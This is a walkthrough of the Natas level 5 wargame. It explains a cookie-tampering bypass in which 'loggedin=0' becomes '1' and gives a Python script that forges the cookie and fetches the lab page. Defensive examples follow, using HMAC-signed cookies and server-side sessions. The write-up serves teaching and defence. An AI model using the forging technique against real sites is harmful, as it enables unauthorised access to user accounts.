In today’s post, we’re going to be looking at Level 5 of the Natas wargame hosted by Over The Wire. This is a web-based wargame and requires the password obtained through level 4. Without further ado, let’s point our browsers at the level5 page and log in!
What’s The Haps?
Upon logging in we get quite an interesting message: it says that we are not currently logged in! Yet the page loaded, which means the username/password we entered satisfied Apache’s HTTP authentication for the directory. So what do they mean, we aren’t logged in? These are two separate checks: Apache’s authentication guards access to the files, while the “not logged in” message comes from the application’s own logic. Let’s look at the source to double check for anything obvious. Nothing much there: there is no form, so I don’t believe the application is expecting POST/GET data for a login (and we wouldn’t know what name/pass to give it anyway). So what else could be communicating that state to the page?
Well, as we said in level 4, HTTP is a stateless protocol. As such, whether or not we’re logged in needs to be stored somewhere and sent along with each request. Since we haven’t provided any info through a web form, let’s look at the next place state can live. Websites often make use of cookies to store small bits of data on a user’s computer, which the browser sends back with every request to that site. They’re often used to track shopping carts, or whether a user has logged in to a web application. So, let’s check our cookies.
To view cookies in Chrome, let’s go to Menu -> Settings -> Show Advanced Settings… -> Content Settings -> All Cookies and Site Data -> Type Natas5 into the search box. Firefox users, there is a similar process. Here we can see that there is one cookie used by the natas5 site and that it goes by the name “loggedin”! Looking at it further we can see that it has the value 0 (presumably meaning false). So now we know the website uses this cookie to track state, and it is telling us we aren’t logged in because of the cookie’s value. What will happen if we change the value of the cookie?
Exploit
To exploit this vulnerability, let’s make use of a simple Chrome add-on called “Edit This Cookie.” Perform a quick Google search to download and install the add-on. Then, load the level 5 page. From here, click on the cookie icon in the upper right hand corner of the address bar to open the add-on. It should already be showing the “loggedin” cookie, with the default value 0. Let’s change that 0 to a 1, then click “Submit cookie changes.” Finally, let’s reload the page. We should now see an “Access Granted” message, along with the password for the next level!
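The same thing can be done without a browser add-on. The script below is an added example written for this post (it is not part of the Natas level or the Over The Wire site) and shows the two layers in play: the Authorization header that Apache checks, and the cookie value that the application trusts. The level URL is assumed to be the one shown in the address bar when you log in; the level 4 password is passed on the command line, and the Set-Cookie line used in the example is constructed to match what the site sets.

```python
import base64
import sys
import urllib.request
from http.cookies import SimpleCookie

# Assumed level URL; use whatever is in your address bar after logging in.
NATAS5_URL = "http://natas5.natas.labs.overthewire.org/"


def basic_auth_header(username: str, password: str) -> str:
    """Build the Authorization header that Apache checks before serving the directory.

    This is the first, server-enforced layer: the natas5 username plus the
    password obtained from level 4.
    """
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Basic {token}"


def tamper_cookie(set_cookie_header: str, name: str, new_value: str) -> str:
    """Parse a Set-Cookie header the way a browser would, change one value, and
    return the Cookie header the browser would send back.

    This is the second, client-controlled layer: the application trusts whatever
    value comes back, which is exactly what the Edit This Cookie step relies on.
    """
    jar = SimpleCookie()
    jar.load(set_cookie_header)
    if name not in jar:
        raise KeyError(f"cookie {name!r} was not set by the server")
    # Reassigning replaces the morsel; attributes such as Path are not sent back anyway.
    jar[name] = new_value
    return "; ".join(f"{key}={morsel.value}" for key, morsel in jar.items())


def build_request(url: str, username: str, password: str,
                  cookie_header: str) -> urllib.request.Request:
    """Assemble a request carrying both layers. Nothing is sent here."""
    req = urllib.request.Request(url)
    req.add_header("Authorization", basic_auth_header(username, password))
    req.add_header("Cookie", cookie_header)
    return req


def fetch(url: str, username: str, password: str, cookie_header: str) -> str:
    """Send the request and return the page body (network access required)."""
    req = build_request(url, username, password, cookie_header)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: natas5.py <natas5 password from level 4>")
    # Constructed stand-in for the Set-Cookie header the server sends on first load.
    forged = tamper_cookie("loggedin=0; Path=/", "loggedin", "1")
    print(fetch(NATAS5_URL, "natas5", sys.argv[1], forged))
```

If the page comes back with “Access Granted,” the next password is in the body; if it still says you are not logged in, check that the cookie name matches what your browser shows, since the script forges only the value.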
So What?
This level yet again emphasizes the statelessness of the HTTP protocol and the way state gets layered on through cookies. More importantly, it stresses why the server needs a sound way of verifying that state: cookie values are sent by the client, so a malicious user can set them to whatever they like. A flag like loggedin=1 must never be trusted on its own. The server should either keep the login state on its own side, keyed by a random session identifier, or sign the cookie value so that tampering is detected.
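To make the fix concrete, here is an added example (written for this post, not the Natas level’s actual source, whose code we never saw) showing the naive check beside two hardened alternatives: an HMAC-signed cookie, and a server-side session keyed by a random identifier. The key and cookie names are assumptions chosen for the example.

```python
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie

# Assumed server-side secret; in practice, load it from configuration, never from the client.
SERVER_KEY = b"constructed-example-key-do-not-use"

# Assumed server-side session store (a dict standing in for a database or cache).
_sessions: dict[str, dict] = {}


def parse_cookie_header(cookie_header: str) -> dict[str, str]:
    """Turn a Cookie request header into a name -> value mapping."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    return {name: morsel.value for name, morsel in jar.items()}


def naive_is_logged_in(cookie_header: str) -> bool:
    """The check natas5 appears to use: trust the client-supplied flag as-is."""
    return parse_cookie_header(cookie_header).get("loggedin") == "1"


def _sign(value: str, key: bytes) -> str:
    return hmac.new(key, value.encode(), hashlib.sha256).hexdigest()


def make_signed_cookie(value: str, key: bytes = SERVER_KEY) -> str:
    """Issue loggedin=<value>.<hmac>; only someone holding the key can mint a valid tag."""
    return f"loggedin={value}.{_sign(value, key)}"


def signed_is_logged_in(cookie_header: str, key: bytes = SERVER_KEY) -> bool:
    """Accept the flag only if its HMAC verifies; a forged or edited value fails."""
    raw = parse_cookie_header(cookie_header).get("loggedin")
    if raw is None or "." not in raw:
        return False
    value, tag = raw.rsplit(".", 1)
    # Constant-time comparison avoids leaking the tag byte by byte through timing.
    if not hmac.compare_digest(tag, _sign(value, key)):
        return False
    return value == "1"


def new_session(logged_in: bool) -> str:
    """Server-side alternative: the client only ever holds an unguessable session id."""
    sid = secrets.token_urlsafe(32)
    _sessions[sid] = {"loggedin": logged_in}
    return sid


def session_is_logged_in(cookie_header: str) -> bool:
    """Look the state up on the server; an unknown or edited id simply has no state."""
    sid = parse_cookie_header(cookie_header).get("sid")
    return bool(_sessions.get(sid, {}).get("loggedin", False))


if __name__ == "__main__":
    forged = "loggedin=1"  # what the Edit This Cookie step sends
    print("naive  :", naive_is_logged_in(forged))      # True: the level's weakness
    print("signed :", signed_is_logged_in(forged))     # False: no valid tag
    sid = new_session(False)
    print("session:", session_is_logged_in(f"sid={sid}"))  # False: state lives server-side
```

Either hardened form closes this level’s hole: the signed cookie because the client cannot produce a valid tag for “1” without the key, and the session store because the flag never leaves the server at all. The session approach is usually preferable, since it also lets the server revoke a login, which a signed cookie alone cannot do before it expires.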